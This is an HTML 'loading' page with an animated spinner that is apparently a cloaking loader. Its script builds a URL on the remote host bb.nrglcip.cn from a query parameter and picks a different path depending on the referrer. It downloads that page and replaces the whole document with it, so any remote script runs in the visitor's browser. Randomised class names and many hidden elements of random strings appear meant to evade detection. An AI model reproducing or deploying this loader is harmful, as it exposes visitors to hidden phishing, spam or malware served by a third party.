<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NQuEgTA7n {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NQuEgTA7n .F4cYbqEjO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NQuEgTA7n .content {
            line-height: 50px;
            text-align: center
        }

        .NQuEgTA7n .img {
            width: 100%
        }

        .NQuEgTA7n .yKOg1zoCoG {
            text-align: center
        }

        .NQuEgTA7n .yKOg1zoCoG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NQuEgTA7n .yKOg1zoCoG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NQuEgTA7n .yKOg1zoCoG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NQuEgTA7n .yKOg1zoCoG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NQuEgTA7n .yKOg1zoCoG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NQuEgTA7n .yKOg1zoCoG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NQuEgTA7n .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function IEUdOJEv9FSMV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Q1HqRT = IEUdOJEv9FSMV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Q1HqRT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Q1HqRT +".html?a=share";
		}
		
        fFd9ZbjM=url+"#"+new Date().getTime();
        fFd9ZbjM && function() {
            $.get(fFd9ZbjM, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >FcZcajvCCIovcB03vEriJwodhxRTOo4f3HjtcvMr5oXEKzxu6Koue7urmYQqCyUOIXlnJDYXdW84ZEc3eAz</li>
<ul style='display:none' >JhFflo9ezGS6EeMnhIpmGWGzBPezWbtbb7NgwEWKnbS</ul>
<p  style='display:none'>tVBDmeEMmqjVIJ2MEdVI59GjtI</p>
<div style='display:none'>E2AWP2YSql8N27sHZuiJbUYynGxZvHpQSYAMpL1Pw8IdSBPMyOz</div>
<p  style='display:none'>tVBDmeEMmqjVIJ2MEdVI59GjtI</p>
<ul style='display:none' >JhFflo9ezGS6EeMnhIpmGWGzBPezWbtbb7NgwEWKnbS</ul><div class="NQuEgTA7n">
    <div class="F4cYbqEjO">
        <div class="yKOg1zoCoG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>mpBrUA9CV1yaDJToY72a246I9fXP8qKUAhtjMbXQK9BILDcGeRzSHojosywnQye7Gz09Jjo0Alyc0B4fuV8p</p>
<b style='display:none' >qh1A9PyzG4AcntVoFvn</b>
<a  href='#' style='display:none'>z6L6ekxiFbjdbNZsDOKPPiCZ45a4wnzaJp7wvmrXEtfwM50MiYP</a>
<h1 style='display:none' >cdSOGd3XP6ECIoRj9KY3nf5hezj7oKGinD42ZmKLYk5oh6dDmpWxUvPDvXcdHUw1sz5XgoW9S64GFINzGVY1d8IZ0bWAF4amMqfmm</h1>
<p  style='display:none'>mpBrUA9CV1yaDJToY72a246I9fXP8qKUAhtjMbXQK9BILDcGeRzSHojosywnQye7Gz09Jjo0Alyc0B4fuV8p</p>
<h1 style='display:none' >cdSOGd3XP6ECIoRj9KY3nf5hezj7oKGinD42ZmKLYk5oh6dDmpWxUvPDvXcdHUw1sz5XgoW9S64GFINzGVY1d8IZ0bWAF4amMqfmm</h1>
<span style='display:none'>Nl8zUPgVv0C1ej6MNavWWl8TRTwW8sBHNXoBYu0r6VBQ7</span>
<li style='display:none' >SH372tyW0wL6v3cNgtjt</li>
<li style='display:none' >SH372tyW0wL6v3cNgtjt</li></body>
</html>